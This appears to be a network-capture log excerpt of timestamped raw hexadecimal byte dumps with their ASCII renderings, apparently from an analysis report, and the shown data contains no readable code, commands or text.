                                                                                                                      2023-09-07 16:19:24 UTC1586INData Raw: df ef c3 5b 6d f3 ca bd 80 6f ad 56 ca d3 93 2f b7 79 56 26 2b 5b 97 ff eb 8d 5b 0f 23 5e 1d b3 b6 25 6a a4 69 d5 d3 6c 8f dd bb f8 a1 6b 5a e9 c6 7d f0 d8 3f df 77 b3 fb 01 8b e6 5a c0 c3 58 bd 97 60 f1 15 64 c7 bc b6 95 e5 dc e9 77 7d ff df 08 23 51 a7 bc 51 1b 3c d9 66 71 e1 d9 a7 56 7f b4 c6 20 6a c8 d2 96 21 7b ff d7 3b cf 2c fe 7c 8c 95 c7 2c 5e 4a 9b f6 96 d5 96 af d6 1f a5 2e f9 7c 8a e6 f7 1f cc 46 3d 1c 79 73 ab 85 bf 9e 4c bd b9 37 d3 0f 36 fa a3 6b ac 5c fd 32 aa f7 bf f9 58 98 b3 59 36 f2 74 46 7b 2d 50 e3 ed 2b c7 e0 6f e6 ef ff 8a 06 73 64 06 37 d1 44 9a 3c dd 48 b7 62 0c da 16 4d 1e 6b 8d cd ff 31 a9 be ff 20 68 62 e5 3e e7 f9 73 2d bd 90 64 69 e1 ca d6 11 54 ba 60 35 f0 ff ab d4 d7 7f 79 73 61 34 07 a2 09 2c d8 72 f2 f2 bc 6f c2 d0 3c 8d
                                                                                                                      Data Ascii: [moV/yV&+[[#^%jilkZ}?wZX`dw}#QQ<fqV j!{;,|,^J.|F=ysL76k\2XY6tF{-P+osd7D<HbMk1 hb>s-diT`5ysa4,ro<
                                                                                                                      2023-09-07 16:19:24 UTC1594INData Raw: 6f 7c b8 c7 28 d3 3f 4e 1d 2e ff 10 f8 67 4e fb 2f 38 ff 6d 46 2a b7 cd 2b e3 b0 bf ba bb 68 1b 05 d2 97 e7 ff 02 c2 9f 93 60 5f 6a 00 7c f7 7f ec 5d 09 5c 4d 69 1b 7f fa 30 95 28 25 cb 0c c3 f0 8d b1 1b 8c 6d 84 69 66 cc d8 4a dd 36 69 bd b4 92 5c 95 44 c9 64 42 a1 28 69 25 95 44 0b a3 b1 96 4a b7 8d 91 6c 69 93 a2 2c a3 ec cb 10 a2 e7 7b de 73 ee ad 7b 8b df 30 f3 2d bf ef f7 f3 d6 73 df e5 be cf 7b 9e f3 9e 73 fe ff e7 7d ef 7b ce b9 70 00 1b 6e 57 63 43 7d 35 de 2d 3e 4c fa 73 b8 6b ac e5 9a 6d 39 be 6f ea 1f 69 9b ad ed 67 fc 58 c4 e6 ef b7 0d e6 6c 65 73 fa 17 e8 9c b9 18 33 51 66 fd 6c 5b 7f 4f a6 fd 66 7e 67 b1 6c 9a 8d 71 37 ac e3 f9 bd 7c 0f 49 a2 2e f5 ab 8e 3c b7 93 94 b5 e6 7d 2e e6 fa ff c9 7f d8 3f b9 08 ff 05 3f 4c 53 12 4b fd b0 a0 8f da
                                                                                                                      Data Ascii: o|(?N.gN/8mF*+h`_j|]\Mi0(%mifJ6i\DdB(i%DJli,{s{0-s{s}{pnWcC}5->Lskm9oigXles3Qfl[Of~glq7|I.<}.??LSK
                                                                                                                      2023-09-07 16:19:24 UTC1601INData Raw: ac 58 01 57 57 57 ac 61 7d bc 76 ed 5a 78 7a 7a c2 d7 d7 17 01 01 01 08 0e 0e 46 68 68 28 22 22 22 10 1d 1d 8d d8 d8 58 c4 c5 c5 09 ff 02 60 cf 9e 3d 48 4f 4f c7 de bd 7b 91 99 99 89 fc fc 7c c8 59 63 96 95 95 a1 92 35 e3 8d 1b 37 70 f3 e6 4d 34 36 36 e2 55 7b d5 5e b5 97 df 5a 03 97 44 a2 d3 7e 56 fd 8d de 4a 74 51 ef d7 57 f5 99 f1 ef 9d 57 ed dd 6e 2c e9 d7 b7 8b ba aa f2 58 aa a9 a2 ad 18 6b f6 eb ad 22 95 f2 8c a4 dd 79 6d a9 54 47 5b 55 a5 e5 7c 5f 15 a9 d8 74 a4 aa 8a b1 8e 8e 8e 1e 37 4d 6d 71 bd 0a 8f 7a ea 49 35 55 d5 5b cf eb e8 69 ab ab b6 e6 18 25 6f f2 fe ea 6d 97 83 9e b6 b6 a6 e4 a5 e4 93 37 6c d8 a0 b2 6a d5 aa 12 37 37 b7 7a b6 06 77 f7 ce e5 93 39 0e eb 7a 79 79 89 df f9 c1 b1 95 78 8f ce e5 93 37 6c d0 f1 f4 14 f2 b9 8d c4 31 b9 d3 fe
                                                                                                                      Data Ascii: XWWWa}vZxzzFhh("""X`=HOO{|Yc57pM466U{^ZD~VJtQWWn,Xk"ymTG[U|_t7MmqzI5U[i%om7lj77zw9zyyx7l1
                                                                                                                      2023-09-07 16:19:24 UTC1609INData Raw: fd 49 28 2c 2c fc 62 f9 17 47 7e fc e8 01 0a 9f 3d 43 39 3e 8c bd db a3 b1 da 68 e2 47 e5 ec 43 78 fc f0 3e 76 c6 79 e0 5e c1 0d 99 e6 5f 5c c1 56 4f 4b 5c 3a 77 18 e5 28 1d c2 37 2d 43 b8 e7 0a 94 25 1e ff f5 10 76 33 1a c3 cf a2 2f b7 85 7b 32 cb ff b9 c3 e9 58 32 4a 11 b9 27 b2 51 8e d2 71 ff 06 cb 29 38 7f 72 3f ca 12 0f ee de 82 cf fc 06 70 9b 48 38 10 bb 46 66 f9 df ee 6f 04 eb 11 84 73 7f a4 a0 1c 1f 46 fe ad ab 70 36 1b 27 dd af 65 89 5b 57 4e c3 5f b7 1a c2 67 11 a2 ad 7b e3 d9 b3 67 32 c9 7f aa fb 74 ac 55 26 9c de b3 15 e5 f8 30 6e 5c 3d 8f b5 c6 23 f0 17 fb a5 b2 c4 c5 e3 99 08 98 ad 88 f8 f9 84 28 cb ef f1 e4 c9 5f b2 b9 ff 37 6b c0 79 0c e1 50 b2 2b ca f1 61 5c bd 70 12 6b f4 07 95 79 fe 4f 66 07 23 50 8b 90 a4 4f 88 59 da 99 f3 ff 58 26 f9
                                                                                                                      Data Ascii: I(,,bG~=C9>hGCx>vy^_\VOK\:w(7-C%v3/{2X2J'Qq)8r?pH8FfosFp6'e[WN_g{g2tU&0n\=#(_7kyP+a\pkyOf#POYX&
                                                                                                                      2023-09-07 16:19:24 UTC1617INData Raw: fe 78 6a e0 7d e0 d7 1b e7 90 b3 aa 1f 22 5d 9a 21 3d c8 07 27 0f a6 e2 de 9d 9f 0c 3e 13 1e dc ff 15 32 0f 2b ec 9f cd a8 f9 9b 4d 77 97 c2 e0 f2 c5 27 cd 9e 6c 90 bd 83 73 c5 e1 90 a7 29 92 ec 4d 71 f9 58 1a f4 95 df ef dc 40 86 8f 2d d2 27 32 48 f6 6a 67 70 4c f8 fb 4e ea ca be dc bb c4 21 4f 65 3f 89 4b 9a ef 87 82 0c 8f cf 71 8a 4f ca 34 86 b3 b7 7f 8e 38 1c 98 2b 9f b7 19 4b 7b e2 f1 a3 3f 21 56 6e 5d 39 8e ac c5 dd 90 4d eb 79 2f ad 85 64 1f 3b 7a 0f f8 07 15 21 79 3b a6 71 eb e0 c0 5c 55 3f 33 a9 ec 60 79 e2 93 e4 8b dd f4 fe b5 df c3 1c fb dc c5 63 bf 87 19 76 8d 67 70 be 78 0f 74 c9 33 5a 87 c5 f1 ab 90 30 a5 16 72 5d 18 ce f7 3c 4a 13 3d 6d 68 6f ad 98 bd 7e 7f a8 3b 52 a7 aa 8e 83 7d 4e a7 b5 71 60 a7 e1 f1 29 49 f4 45 f2 24 f6 de 63 8e bd b3
                                                                                                                      Data Ascii: xj}"]!='>2+Mw'ls)MqX@-'2HjgpLN!Oe?KqO48+K{?!Vn]9My/d;z!y;q\U?3`ycvgpxt3Z0r]<J=mho~;R}Nq`)IE$c
                                                                                                                      2023-09-07 16:19:24 UTC1625INData Raw: be 1f 8d ec c0 1f 70 39 e1 00 f2 63 f7 22 65 db 2c 44 38 f6 46 8c 4b 5f d6 6e 24 ce 7d 00 78 d4 66 64 9e 26 82 26 b5 c6 81 c9 ea 28 bf 2a fb fb f1 3e 79 27 45 ad b2 40 d4 02 dd 86 b1 be 5d c5 71 bb 0d 11 3e b7 07 32 0f ff 28 93 7f d9 c5 0c 1c 59 64 48 c6 c2 a0 ae 0d 9e 68 1b 49 63 aa cf d3 42 c4 fc 5e 04 3d 70 d4 b1 17 db 36 5b 66 b1 28 ce f8 12 32 5e 6e f4 9c e9 20 6c 91 31 79 7f 5d 90 e3 f7 5b 29 8e 2e 37 27 6d f6 41 e4 22 09 9b 01 51 9a da 1a 1c 73 d4 41 88 83 1e ae a6 71 3f 0f ab 4a af 21 72 a5 05 8e cc ed 25 b4 4f 58 d4 af 1e ac cd 82 21 9b 1f b5 50 5f 08 b1 0d c3 a2 7e a2 32 12 fa 9c b4 71 c4 6d 30 2a 8b 2f cb c1 bf 84 94 1d 86 f0 d9 bd 70 d4 41 4f 2a 8e 39 f6 c3 91 39 bd 70 78 36 f9 4e 0b f8 11 37 2f 9d c4 f9 a8 bd b8 71 21 1d d5 a5 57 91 7f fc 20
                                                                                                                      Data Ascii: p9c"e,D8FK_n$}xfd&&(*>y'E@]q>2(YdHhIcB^=p6[f(2^n l1y][).7'mA"QsAq?J!r%OX!P_~2qm0*/pAO*99px6N7/q!W
                                                                                                                      2023-09-07 16:19:24 UTC1633INData Raw: fd d9 72 f0 d1 df 4d 82 44 c1 2e 1a 1a ae 21 22 7f f5 b7 c7 0e 9b bc 38 34 7c d9 44 8c e5 e1 21 c6 93 14 06 cc f1 8e 0c d7 94 fd 5f 95 ec c2 45 5f ce 19 20 3f c7 3b 4a a4 37 03 c3 5e 24 b2 d2 92 7f 55 8d 17 2e 72 97 fd 33 01 4f 51 88 85 ea a8 4f df 33 0b 8a 8a f0 14 3a 78 45 44 f9 9b aa 7c 06 43 17 f0 44 51 51 22 2c 21 4b e6 e3 12 f2 c9 3b 0e bc 35 78 2f 2a 68 89 83 f2 14 9c e0 e8 77 1d 9d 6d 7d 7c 6c 9d 1d de 1d cd ed c0 94 57 c6 db bb b9 f1 c7 bd 32 b5 67 0f a7 29 0f 19 fc 16 f7 51 45 f8 cf df 01 6e c8 fe 3e 07 be d2 09 ec d7 5d 9e 15 3d f5 e9 03 ba fb c8 fa fe de cf d7 f4 0e 65 5f fd cf 46 ba 69 45 0e 13 7e 21 1e ca 9f d2 21 2b 78 3b 77 94 bb f6 fa 77 56 99 8d 7d 56 3f 95 30 ab 21 23 dc b4 62 47 79 ce bd 87 39 95 61 de 63 76 f8 9e 01 73 16 c3 3c c8 30
                                                                                                                      Data Ascii: rMD.!"84|D!_E_ ?;J7^$U.r3OQO3:xED|CDQQ",!K;5x/*hwm}|lW2g)QEn>]=e_FiE~!!+x;wwV}V?0!#bGy9acvs<0
                                                                                                                      2023-09-07 16:19:24 UTC1640INData Raw: f3 a4 70 ca da 36 e7 10 2d ec 77 ab 0e 7b 57 9d 7d 6b e7 bc 07 de 53 ef 8d c2 59 47 d3 a4 95 37 62 2c 95 6f 17 f7 ac e7 b4 cd d1 d8 5d 79 c2 89 89 15 c3 19 42 e8 0b e6 f1 b8 e9 b4 e7 ea 06 96 45 98 63 e2 a7 7d 80 66 d6 6e 5f 79 4d f6 cb dc dc dc bd bd bd 95 b5 35 d2 8b 08 b2 69 9e 30 ad 90 4c aa df 63 58 d4 c4 c6 34 85 c9 98 9d 9f fb ed b5 57 08 21 84 10 42 08 21 84 d0 f5 24 54 aa 73 84 93 05 1d 73 32 d5 7e 8f ea b0 67 e5 48 a6 76 0d 68 3c 83 da 73 72 8d 47 aa 76 49 56 8e 3a 17 0f 04 33 f6 86 71 4b d5 b0 9e 2b d5 e6 76 2c 46 94 f6 17 76 4c 8d 2c e9 ce 10 42 5f b6 36 41 73 5d 66 b4 59 5c 68 16 e5 99 da 73 2e cf 2a e1 4e f3 d9 0c 06 c3 60 30 78 3c 9e f0 ff 65 ef 4e c0 6a 4c fb 3f 80 fb 5f af a5 e7 0c ed 9d ad 4e fb 1e 15 45 29 4b a9 b4 77 ea b4 2b da 0f 2d
                                                                                                                      Data Ascii: p6-w{W}kSYG7b,o]yBEc}fn_yM5i0LcX4W!B!$Tss2~gHvh<srGvIV:3qK+v,FvL,B_6As]fY\hs.*N`0x<eNjL?_NE)Kw+-
                                                                                                                      2023-09-07 16:19:24 UTC1648INData Raw: 0e b4 35 c7 ab c1 52 01 e1 c6 98 aa 31 96 7a 84 2e 7f d1 9d 93 6c e2 f8 ec 94 87 6e e2 68 86 a9 12 c0 b9 51 38 87 2a df 40 f3 1a a7 79 ed 96 86 6e d7 e6 1c f2 8e db cc 54 01 f8 d5 62 a9 0d 9c e0 c3 be 71 ef ca c3 77 09 03 77 08 02 b6 f1 03 b6 72 03 26 39 7e 00 81 70 c1 5e 77 61 1d 8e 5b 92 57 05 95 7d ff fe fd 96 7f 95 05 51 3e 7d fa b4 85 40 2c ff 89 0c 0a 1f 44 f9 d1 a3 47 4f 9f 3e 05 27 f7 ec d9 ed c0 9d 87 d3 da 10 f5 18 bc fe cf 77 d0 91 f3 10 5a 21 86 53 e1 20 a8 75 e2 d5 38 49 9b dd d9 66 07 76 d5 02 de 4a 27 65 23 c5 bb 99 ae 6a a5 8a 1a 5d 3c 4a 1c 28 79 08 b3 dc 96 55 65 87 5a a5 9d 87 d9 16 8c 59 61 4b 37 62 68 f9 b6 1e 46 7b 5a 16 56 aa 65 8c 8f 8f 5b 26 24 54 6d a8 cb e7 ce 9d bb 72 e5 ca f5 eb d7 6f dd ba 05 05 dd c2 4b 30 27 4f 9d 3a e9 eb
                                                                                                                      Data Ascii: 5R1z.lnhQ8*@ynTbqwwr&9~p^wa[W}Q>}@,DGO>'wZ!S u8IfvJ'e#j]<J(yUeZYaK7bhF{ZVe[&$TmroK0'O:
                                                                                                                      2023-09-07 16:19:24 UTC1656INData Raw: eb 90 4e 9d 9a 66 ad ea 26 1d 1a 66 4c 25 78 27 c8 7c c8 d8 a9 03 60 30 38 38 5f d1 33 1e d7 ff ac 74 f6 4d f1 f4 57 45 a2 3c f8 aa f0 af 79 4d 9c de 5b 5c 5c 98 9c 9d 61 80 2c 7b b5 2c 44 75 ae 43 c3 b4 55 cd 98 af 6a 24 6a 74 f5 72 90 1a 59 50 b5 8c 46 c1 19 75 cf 2f 95 2a d3 ca 76 3e 97 70 a8 c9 a4 42 d9 90 2e af 9d 2f a5 96 70 52 9f 28 e3 30 ac a9 5b fe f7 1d 74 ba d4 2f 1b fb 69 a2 b2 f4 97 1f fe 3c 3e bf 56 37 3a 5f 36 f4 b8 66 6c b1 f7 d1 9a e8 6e f9 fc e9 92 c8 c3 b9 e5 08 aa 1f 82 7f c6 84 27 6f d4 24 8b 60 c9 18 d0 ce ea d7 49 eb 51 4e 41 c8 52 3a 44 49 cd c2 e3 2a a9 47 94 92 25 e4 c3 0f 2b 58 fd e7 e8 78 ef ce 27 7a 34 75 ab e2 32 90 7e 45 3e df 5d 2a c1 e6 24 d1 57 e6 46 ba 66 b9 df df 77 d0 35 04 7f d9 df f6 91 71 ce 3c 5e a6 e6 f8 f1 23 cf
                                                                                                                      Data Ascii: Nf&fL%x'|`088_3tMWE<yM[\\a,{,DuCUj$jtrYPFu/*v>pB./pR(0[t/i<>V7:_6fln'o$`IQNAR:DI*G%+Xx'z4u2~E>]*$WFfw5q<^#
                                                                                                                      2023-09-07 16:19:24 UTC1664INData Raw: 4e a8 4f 34 e3 ff ed dd dd 1f 6e 3b 68 b6 da 02 cb 6f 25 af f3 45 dc f7 5f ca 66 31 75 df be f6 df a0 26 e0 55 47 91 84 ef 4f 88 df c5 f1 d6 a2 e8 6b fa c9 af 77 4d bd da 3c 14 50 4d 06 dd 0a c6 0c 5a 2b 99 11 ce 8d 86 5c 62 d0 26 04 4c dc a0 5d 08 46 7e 87 65 79 74 74 87 8a 6c 57 4c 5b a5 13 66 11 de 28 1a 93 13 6e 0f 61 fb fe e5 e3 9d 1f 9c 8c df 10 97 b4 f5 52 66 46 fb 20 9f cb d4 aa 84 0f 79 3d df 87 40 bb c9 70 f8 5a cd 9a e8 0b 9f 9c 3c 4b 67 50 02 2e a3 db 69 9a 68 bf ce 1b 6b e0 b6 9f 49 de fa cf fb b2 6f 9c 99 d3 68 35 50 9c 13 ea b4 22 8d 5a 28 96 b0 d9 5c 86 4c ad d0 1a 75 03 f7 cb 2f 9e 39 1a 80 c1 60 b0 ff 4f f0 39 39 7a ad f4 50 db cc 85 01 5e 3e 25 72 e1 00 f5 26 a8 1f 55 b2 9d d5 5c 57 2d cf 0d 55 0d d7 53 c5 76 dd e2 b8 12 70 8a af b0 d2
                                                                                                                      Data Ascii: NO4n;ho%E_f1u&UGOkwM<PMZ+\b&L]F~eyttlWL[f(naRfF y=@pZ<KgP.ihkIoh5P"Z(\Lu/9`O99zP^>%r&U\W-USvp
                                                                                                                      2023-09-07 16:19:24 UTC1672INData Raw: 58 d9 8b cd 6f db 17 51 be fb 4e d3 de 72 fa 9e aa 91 cf 1d 82 ee d5 35 2a a1 e5 aa 81 3e 7c 32 2a d5 6a 54 6c 39 2c d0 ab 1b aa 66 8a c6 11 a4 4f 89 a4 4e cf e7 71 8f 67 e1 ca 9b 75 60 ce 60 06 45 e8 1e ae 87 00 71 16 22 34 05 d2 af 44 98 73 08 7f 0e 09 17 cd 5d 18 54 1e 4e 2d ba db d6 a3 7c 93 40 db ce ce 2f d2 b3 74 c6 67 16 85 e5 d6 f9 a6 50 2c 70 09 96 7e 89 ae 51 e4 1b f1 b9 d8 e7 13 a7 a0 74 0b 42 12 0a 17 af 8b 25 9e b0 0c 38 61 89 df 7a 06 a3 79 c9 c9 35 32 cb 2e 28 59 df 99 70 de c4 56 2a 95 2a df fa 72 ae a0 7a 87 20 08 82 96 50 f7 28 e3 a0 47 e0 a1 ac 5a 73 2a 2b 66 5c 98 3c 29 89 1e e5 47 f4 73 a2 68 ac 18 1a 2b 81 c6 4e e9 67 a7 f5 b2 12 5b 47 52 5a 86 33 5a 87 ef b5 8f 16 d3 98 94 21 ee f7 05 5d 1b 6d fd f1 39 0f 95 d0 f2 96 54 d7 78 36 ed
                                                                                                                      Data Ascii: XoQNr5*>|2*jTl9,fONqgu``Eq"4Ds]TN-|@/tgP,p~QtB%8azy52.(YpV**rz P(GZs*+f\<)Gsh+Ng[GRZ3Z!]m9Tx6
                                                                                                                      2023-09-07 16:19:24 UTC1679INData Raw: 91 91 01 4c 1d 51 52 3a 71 42 55 4d 12 c7 8f 1f 57 51 51 51 96 04 40 46 ed 94 da e9 d3 a7 4f e8 69 6e 2c 57 ba da 37 43 59 e2 98 92 d7 a3 db 85 3d ea a1 2f ce 04 55 83 4e e3 aa d5 b0 4f 4e fa 16 1d f3 cc 3c ea 4c 50 b6 8f 47 a3 d1 37 4d 8c 7f d7 bb 08 ba a4 af 0b 2d 26 12 0a 9e a6 04 51 86 5e 82 c6 fa 6a aa 52 43 a4 6f 11 09 05 fc 17 25 05 42 a1 70 75 8b 91 3b db cf 9c 94 23 95 e4 0b b8 ac e9 2e 52 1f 29 a0 2b d7 75 b4 d4 93 cd a6 5b a0 10 a4 b2 e2 86 fa ba c1 81 de 05 da ac 40 6c cc b8 02 81 58 5c 2e 8b dc d1 1a 1f 13 05 27 20 7b 50 e6 75 57 87 50 c8 cb 24 c4 e8 68 1e 3f 2a b7 21 8e 89 21 d6 f4 6c 7b d8 0d 29 c4 34 37 00 31 69 06 6a 34 26 41 59 bc 15 f2 81 8f 78 b0 88 84 1f f9 d5 33 20 88 c7 61 31 e6 a7 98 f3 53 45 4d 25 3e 8d f8 8e b9 89 8e 51 6e 79 d3
                                                                                                                      Data Ascii: LQR:qBUMWQQQ@FOin,W7CY=/UNON<LPG7M-&Q^jRCo%Bpu;#.R)+u[@lX\.' {PuWP$h?*!!l{)471ij4&AYx3 a1SEM%>Qny
                                                                                                                      2023-09-07 16:19:24 UTC1687INData Raw: a2 c7 4a a9 a1 ec 99 34 53 02 4d 6d fe 18 b4 89 c8 d0 20 45 73 10 70 e4 7c f6 e6 da f4 db 25 b1 80 25 e0 1f 09 71 f9 34 c4 7e 94 3c b7 b4 ca b1 c8 90 20 35 8e 31 17 88 11 ce 5a 27 da b3 0d 16 06 74 e7 fb 55 32 a1 8e 58 d3 c7 0d 69 bd 08 2a fe ab f2 d0 5d 45 fe 69 f8 22 f9 c2 98 8c 3c 24 9d ed 95 4c 12 c4 23 cd a2 81 1a e1 c3 32 7e 57 e1 b7 99 6e 5f 97 86 5e e9 2e 0d e1 90 8c fb eb 0f 14 46 62 1c af b3 59 bf b4 a1 2d d2 a4 20 d8 e0 4f ae c6 1f a7 fb 3f 51 9a df 07 fe 56 06 49 91 53 d4 f9 e5 45 b9 84 cb 5a bf cb 86 69 d2 94 44 54 03 d2 93 91 1f 4c c3 78 6d fa 06 b6 4c 1f 76 03 da dd ce a2 aa aa 4a 20 14 9a 59 58 dc 9b c2 1b 50 87 f4 16 06 d7 4a 7f 61 d0 88 3a ac 5f 91 e3 eb eb bb 9d b1 ea f8 11 b2 2b ba 29 be 6e 26 b7 8b 85 7d c8 29 ea e3 16 f5 73 b1 bd 9c
                                                                                                                      Data Ascii: J4SMm Esp|%%q4~< 51Z'tU2Xi*]Ei"<$L#2~Wn_^.FbY- O?QVISEZiDTLxmLvJ YXPJa:_+)n&})s
                                                                                                                      2023-09-07 16:19:24 UTC1695INData Raw: cd e8 cc 34 80 ea 89 45 5a 3a 70 1e e7 77 30 69 bd 70 af 87 31 45 3e 46 fb 10 63 08 d4 be b7 68 c1 4e 9b 1e 46 ff 92 eb a3 78 6a 73 71 d4 a4 b9 50 3b 7c 00 6b cd 22 1c 00 1f b1 01 1d 1b 08 21 cc 24 b8 8f 50 99 ed c9 af 5a 62 8c 5c 3c cb 7a 5c 54 8b d6 4f f4 67 e1 d4 13 35 52 73 08 10 2b f8 f5 1d 20 43 80 38 48 5b c8 ec c1 e8 c6 bf 87 c4 ba 57 10 27 9c 19 16 17 2c b1 57 5c bd d6 bd 04 eb de 6d b5 e2 49 ef 06 16 30 76 81 ab 17 14 d9 ae 63 74 64 40 3d e3 69 cd 59 9a 43 6b 63 05 0d 0b 82 e3 78 d7 56 cc 25 7d 30 bf fe 37 00 2b 68 c8 89 0d f0 97 2b da 82 d5 db 85 95 53 a7 21 d8 46 80 ec 4a d1 18 54 a0 79 00 3d a3 1b 84 b4 80 87 00 e2 fb 3d d6 65 71 18 2f 81 63 b2 0a 60 26 95 c5 00 f1 54 5e c4 d3 81 4a 3d 5e e7 a9 c4 d5 1b 27 2c ef 35 f8 1f 5b 25 a0 ac 92 ca 99
                                                                                                                      Data Ascii: 4EZ:pw0ip1E>FchNFxjsqP;|k"!$PZb\<z\TOg5Rs+ C8H[W',W\mI0vctd@=iYCkcxV%}07+h+S!FJTy==eq/c`&T^J=^',5[%
                                                                                                                      2023-09-07 16:19:24 UTC1703INData Raw: 10 26 b0 8c 9b ed d8 bf 68 d0 56 36 fc ce af c2 f6 a3 df a8 72 89 36 f7 ff 02 69 fb fb ce b8 ef 69 c8 1f ed f8 be 76 d3 4f ac f6 64 03 bb e3 81 1d 61 f9 5e b1 f7 84 c4 30 62 50 08 36 81 fb de 6a c7 f7 75 9b 8e c8 77 8e 6d c7 40 f6 5d 46 18 31 d8 4e f7 1d c0 06 70 bf af 2c fb 5e da e8 bb dd 18 a8 7d 77 20 06 fd c1 22 70 9f ff 70 c2 77 ab 31 d0 f3 3d cc 18 fc 3f 58 04 ee b3 c0 8a 8d 8b d1 ff 0d ef eb fb cf 04 62 60 e6 3b 61 4f e5 09 d6 bf d0 b2 ff 35 74 cd 62 c1 7d e0 d7 55 2c 52 31 70 d1 77 99 43 2c f8 de 5e b1 9f eb 31 88 80 ef c4 c7 2c f8 7f 2d df c7 f5 18 44 c8 77 62 99 05 ff 67 f1 7d 5c 8f 41 e5 81 da 48 f8 4e 3c 26 da 0e 3a 75 9d 27 12 03 23 ec d9 e7 98 ef 32 85 be 78 83 f9 36 f1 fc 51 8b 81 0b be 13 7b 0a fa bf 8d e7 8f 4a 0c 5c f2 9d f8 5f 82 fe 6f
                                                                                                                      Data Ascii: &hV6r6iivOda^0bP6juwm@]F1Np,^}w "ppw1=?Xb`;aO5tb}U,R1pwC,^1,-Dwbg}\AHN<&:u'#2x6Q{J\_o
                                                                                                                      2023-09-07 16:19:24 UTC1711INData Raw: ec e5 b8 5d 1c e7 1b 7f 70 ff be 7d ab 56 ae 4c 4c 3c b0 36 22 22 f5 f7 3f 34 fa 85 2e df 24 2d 2b 7e b2 95 e3 16 a4 64 79 ba bb 85 2d 0c 59 15 ba 2c 39 31 21 33 ed 74 4e fa 39 35 7e 81 0f 1f 2e 89 73 4f bf b3 e8 52 19 ef 17 92 62 f6 ff 72 30 f1 44 d2 e1 d3 bf 1d 0b 5d a4 da 0e c2 d0 60 ee 5e a1 5f 88 df bd f3 a7 1f 7f 48 8e 8b 9e e0 34 5e 23 4e d5 2f 24 44 6e 5f b3 7c a9 6e 7a ad e4 17 50 01 74 c3 fd 9d 7e a1 76 9f 0c 7e 7b da 11 c2 5d a4 f4 58 24 73 2c eb 1b 41 bd 06 f5 a1 41 a3 86 d0 d0 b8 31 18 1b 37 81 46 4d 4d c0 a4 a9 29 98 9a 35 83 16 66 cd a1 65 cb 16 d0 aa 75 2b 68 d7 a6 35 b4 6f df 16 cc 3a b6 03 8b 8e ed a1 4b a7 8e d0 b5 6b 67 e8 da fd 63 e8 dd b3 3b f4 e9 d3 13 fa f4 ef 03 16 9f f4 03 6b cb 7e 60 63 6d 09 36 9f 58 c3 d0 41 36 30 6c d8 20 b0
                                                                                                                      Data Ascii: ]p}VLL<6""?4.$-+~dy-Y,91!3tN95~.sORbr0D]`^_H4^#N/$Dn_|nzPt~v~{]X$s,AA17FMM)5feu+h5o:Kkgc;k~`cm6XA60l
                                                                                                                      2023-09-07 16:19:24 UTC1719INData Raw: bd d9 fa 8c c1 f0 0e c2 1c 07 1c 6b 90 f8 43 2d 0a 5e 41 b9 0c c7 20 24 e9 f2 09 ad e6 3b e0 58 86 69 45 22 66 56 e3 1b 70 8c 43 70 cc c0 78 01 6d e7 3b d0 75 13 bd 8d d5 11 cb 6b cc d7 f1 0e 3a de e1 c9 f0 0e cb 55 78 87 15 da ce 77 30 32 00 c3 31 26 60 6a 6a 02 22 f3 d1 60 36 d6 92 69 4a da 3a d8 c3 04 c7 f1 e0 22 75 85 c9 1e ee e0 e5 e7 0d 81 fe be 10 34 3d 88 9b bb b0 7e 31 c8 c2 67 c2 ac d0 10 98 1d 35 eb 77 73 08 9a b8 83 81 6a 3a 2a af a1 18 a8 86 63 bf fa 8d 4a 5c 40 f8 95 b7 d4 b8 80 d9 1f 77 cf 2f 98 fb e9 31 b5 75 12 4c b7 f1 f3 bf 0e 58 e7 40 d0 6a a4 3c c0 e2 1b ef 33 2e 60 c9 ad 2b 83 9a 5b 40 b9 80 d4 db 57 75 7c 80 ce 7e 37 ef 50 6a 61 f9 ac a9 c5 94 1e b9 ce b6 a1 a9 f9 f9 f9 a9 a1 b6 e6 4a b9 65 63 e3 f2 52 12 62 62 63 12 52 f2 5e b4 0a
                                                                                                                      Data Ascii: kC-^A $;XiE"fVpCpxm;uk:Uxw021&`jj"`6iJ:"u4=~1g5wsj:*cJ\@w/1uLX@j<3.`+[@Wu|~7PjaJecRbbcR^
                                                                                                                      2023-09-07 16:19:24 UTC1726INData Raw: 29 c3 3a 37 a3 41 5d c7 18 d2 e8 ae c3 bb 34 a3 11 d0 4f 60 40 fd 80 9e f7 19 3a 73 fc 14 81 60 ca f8 29 78 6e 2b e8 dd 6e ec 6b 33 07 5b 0b c6 8f 17 d8 e0 b9 4b c7 0e 93 46 59 58 0c 9e 39 45 60 8b ef f0 ce 78 d1 b2 53 fb 9e bd da 8f 9d 81 2f 76 da 0b a6 cd 7c be 7b 8f a9 ff 65 ef 4a e0 6b ba b6 fe 8a 04 31 14 71 33 0f c8 48 43 e5 d5 4c 29 22 51 31 3c 34 86 d2 af 54 9b 98 12 49 64 9e 07 89 21 48 62 0c 55 8a 47 4b ab aa 5a cf d3 3e a5 d5 99 4e df fb 79 cf fb cc 42 46 21 93 48 48 64 7d 6b ef 73 ee bd e7 ce 37 83 74 b2 9c 95 de b3 cf 7f af b5 f6 da 7b ed b5 cf b9 fb 9e fa 58 74 19 3a a9 27 4d 60 93 bc 47 4f ea fb ac 9f df d0 6e 32 b6 b9 d5 c5 d7 7b b4 b7 9f f7 e8 d1 13 ff e2 ca cf 9f 1f ce 68 e4 f0 e1 be be cf f7 68 ac fd 9e ea 2e 48 35 31 cc 52 6a e6 fe 9a
                                                                                                                      Data Ascii: ):7A]4O`@:s`)xn+nk3[KFYX9E`xS/v|{eJk1q3HCL)"Q1<4TId!HbUGKZ>NyBF!HHd}ks7t{Xt:'M`GOn2{hh.H51Rj
                                                                                                                      2023-09-07 16:19:24 UTC1734INData Raw: 2a 81 83 e4 87 96 95 16 42 e5 97 c5 b0 ee c4 3a e1 dc f9 88 6c f2 7d b7 3f 85 f0 7c 84 35 e4 73 a7 b3 3f 5a 8a 50 70 fe 22 e4 93 ef 7c f4 e8 51 20 f7 03 f0 de 5d c0 fb 75 f0 f8 d9 03 ea 0f 1f 91 ae 3f 82 e7 e4 a3 22 3e 87 0f 02 e7 4f 8e d7 d4 20 18 5f 7e e6 f5 9b 67 34 34 cb ca 4f 95 6b 9e 39 75 aa bc 8c f2 69 be 92 e7 a4 c6 f8 33 e7 cf 9c 3f 5f 36 ea ec a9 53 27 4f 9e 2c d7 28 a3 2c d5 92 db 9a e5 e5 65 7c fb d4 a0 21 13 cf 53 86 f2 93 1a f4 92 f1 1a 92 fb 1a e7 c7 ff fb 3c c1 20 8d 35 aa 1a 67 f8 0d 9a e5 df 8c 1f a7 f9 e2 fe 19 dd 1f cf 57 57 6b 